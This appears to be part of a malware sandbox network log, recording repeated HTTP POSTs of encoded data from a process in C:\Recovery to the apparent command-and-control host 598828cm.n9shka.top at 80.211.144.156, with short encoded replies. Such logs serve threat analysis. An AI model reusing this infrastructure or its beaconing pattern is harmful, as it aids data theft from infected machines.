                                                    Sep 14, 2024 12:53:48.543890953 CEST1012OUTData Raw: 53 52 5c 5f 51 42 5a 5b 5e 5e 56 51 56 5e 54 5e 57 51 5c 5b 57 5d 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SR\_QBZ[^^VQV^T^WQ\[W]U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?!Z3>>57>*!Y4'+%7+%5!3Y,<&F/%Z-=
                                                    Sep 14, 2024 12:53:48.885278940 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:49.077507973 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.46280980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:49.203115940 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:49.556320906 CEST1748OUTData Raw: 56 50 59 5e 54 43 5f 5b 5e 5e 56 51 56 5f 54 5f 57 57 5c 5a 57 59 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VPY^TC_[^^VQV_T_WW\ZWYUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%[?/%[3==5#=.*\"<X'#%9/(?R2*%##![.<&F/%Z-9
                                                    Sep 14, 2024 12:53:49.895952940 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:50.200736046 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 04 3e 1a 0a 5b 22 3a 0d 0c 2a 3f 22 59 3d 0b 29 05 3e 2c 28 07 3d 27 3e 03 2a 3e 37 57 30 05 2f 02 27 22 29 58 33 0e 2f 50 22 3b 2e 5a 0c 1d 20 01 21 33 2e 5b 25 3b 2e 13 27 57 36 59 23 0c 27 5c 32 38 31 5a 35 11 31 05 3c 16 26 09 3d 0f 29 1f 3d 04 3a 40 2e 3d 04 56 37 38 23 51 00 10 26 19 31 3e 32 04 35 37 39 53 3d 32 35 58 26 0b 2d 0f 30 38 35 05 31 06 36 01 27 0d 20 02 35 22 24 01 33 05 20 01 34 0d 04 0a 28 2e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: >[":*?"Y=)>,(='>*>7W0/'")X3/P";.Z !3.[%;.'W6Y#'\281Z51<&=)=:@.=V78#Q&1>2579S=25X&-08516' 5"$3 4(.#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.46281080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:49.208008051 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:49.556190014 CEST1012OUTData Raw: 56 5f 5c 5c 51 46 5a 5d 5e 5e 56 51 56 53 54 58 57 51 5c 5b 57 5c 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V_\\QFZ]^^VQVSTXWQ\[W\UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?<X&>6'<Y*-!/X3; X17+/Q1\) !]/,&F/%Z-
                                                    Sep 14, 2024 12:53:49.873395920 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:50.199666977 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:53:50.214766026 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.46281180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:50.337892056 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:50.696820974 CEST1012OUTData Raw: 56 5e 59 5f 54 49 5f 58 5e 5e 56 51 56 59 54 58 57 52 5c 5e 57 5a 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^Y_TI_X^^VQVYTXWR\^WZU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(Z"0*5#)[*]!X$81#[+_ 2954!\,<&F/%Z-!
                                                    Sep 14, 2024 12:53:51.026640892 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:51.158409119 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.46281280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:51.284390926 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:51.634628057 CEST1012OUTData Raw: 56 52 59 5b 51 46 5a 58 5e 5e 56 51 56 53 54 5a 57 54 5c 5b 57 59 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRY[QFZX^^VQVSTZWT\[WYU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<Z&0>2"#==*5?83;8X%),?9/%:9^#!8&F/%Z-
                                                    Sep 14, 2024 12:53:52.171122074 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:52.171145916 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:53:52.171170950 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.46281380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:52.301625967 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:52.649991989 CEST1012OUTData Raw: 53 50 59 59 51 44 5f 5f 5e 5e 56 51 56 59 54 5f 57 5f 5c 54 57 5c 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SPYYQD__^^VQVYT_W_\TW\UYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(,&$X:57()!!Y ['+8%?^<3'9)_#3.<&F/%Z-!
                                                    Sep 14, 2024 12:53:52.967427015 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:53.096456051 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.46281480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:53.279352903 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:53.634370089 CEST1012OUTData Raw: 53 50 59 5d 51 43 5a 53 5e 5e 56 51 56 5a 54 5c 57 56 5c 5c 57 59 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SPY]QCZS^^VQVZT\WV\\WYU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+9^0&R!Q4X>=-"''+#%)#[+:4%"709/&F/%Z--
                                                    Sep 14, 2024 12:53:53.963699102 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:54.182795048 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:53:54.182822943 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:53 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.46281580.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:54.413625956 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:54.759351969 CEST1012OUTData Raw: 56 53 59 58 54 47 5f 5f 5e 5e 56 51 56 5f 54 5b 57 52 5c 58 57 5f 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYXTG__^^VQV_T[WR\XW_U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\(<-$"Q<>=1#?%84&\#*9/%:##,<&F/%Z-9
                                                    Sep 14, 2024 12:53:55.086540937 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:55.359038115 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:53:55.359080076 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.46281680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:55.360035896 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:55.712558031 CEST1748OUTData Raw: 56 56 59 5b 54 45 5f 5b 5e 5e 56 51 56 5e 54 52 57 5e 5c 5b 57 5b 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VVY[TE_[^^VQV^TRW^\[W[U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?!Z'..R#7$>55<[%(;%:0??P2* 0"8&F/%Z-=
                                                    Sep 14, 2024 12:53:56.044328928 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:56.241843939 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 04 29 42 2f 03 23 04 0d 0c 2b 2c 22 11 2b 32 08 15 2b 2c 23 18 28 27 35 58 29 03 33 18 30 3f 2f 02 27 57 36 06 24 37 2f 56 35 3b 2e 5a 0c 1d 23 5a 34 0a 2d 00 26 28 2a 11 24 57 36 15 37 32 33 5d 32 38 2e 05 36 2f 07 04 3c 16 3a 08 29 31 2d 10 29 13 3e 40 2c 04 2d 0a 37 12 23 51 00 10 26 51 31 00 21 13 21 27 2a 0c 29 0f 29 5d 25 1c 31 0f 24 38 31 00 32 3b 36 00 33 33 01 5c 20 22 2f 1f 33 2f 3b 1a 34 30 2d 1b 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: )B/#+,"+2+,#('5X)30?/'W6$7/V5;.Z#Z4-&(*$W6723]28.6/<:)1-)>@,-7#Q&Q1!!'*))]%1$812;633\ "/3/;40-?#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.46281780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:55.360222101 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:55.712485075 CEST1012OUTData Raw: 53 55 59 5c 51 45 5a 58 5e 5e 56 51 56 53 54 5f 57 51 5c 5d 57 5d 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SUY\QEZX^^VQVST_WQ\]W]UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X(Y'*S!*>5!3\%?*9'V27=Y,<&F/%Z-
                                                    Sep 14, 2024 12:53:56.026160002 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:56.152390003 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.46281880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:56.308146954 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:56.665586948 CEST1012OUTData Raw: 56 51 5c 5c 54 46 5a 5c 5e 5e 56 51 56 52 54 53 57 55 5c 5f 57 5b 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VQ\\TFZ\^^VQVRTSWU\_W[U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X*,$>&5>.Z5?0$_'*$*:#P%*5_40"/,&F/%Z-
                                                    Sep 14, 2024 12:53:57.002110958 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:57.138061047 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.46281980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:57.285962105 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:57.634428024 CEST1012OUTData Raw: 53 52 59 5c 51 45 5a 59 5e 5e 56 51 56 53 54 59 57 54 5c 5b 57 5a 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SRY\QEZY^^VQVSTYWT\[WZU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]<<.3--!(X**6(Y$('%9<?4%& !,<&F/%Z-
                                                    Sep 14, 2024 12:53:57.962913036 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:58.150911093 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:57 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.46282080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:58.285222054 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:58.634613991 CEST1012OUTData Raw: 56 50 5c 5b 51 43 5a 58 5e 5e 56 51 56 5a 54 5c 57 52 5c 5d 57 5f 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VP\[QCZX^^VQVZT\WR\]W_U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,)$.#$(Y*2"?(0+ Y%:?<+V1\57U)/,&F/%Z--
                                                    Sep 14, 2024 12:53:58.978037119 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:59.114250898 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    55192.168.2.46282180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:59.448843956 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:59.806260109 CEST1012OUTData Raw: 56 55 59 55 54 45 5a 5a 5e 5e 56 51 56 5e 54 52 57 5e 5c 5f 57 5d 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
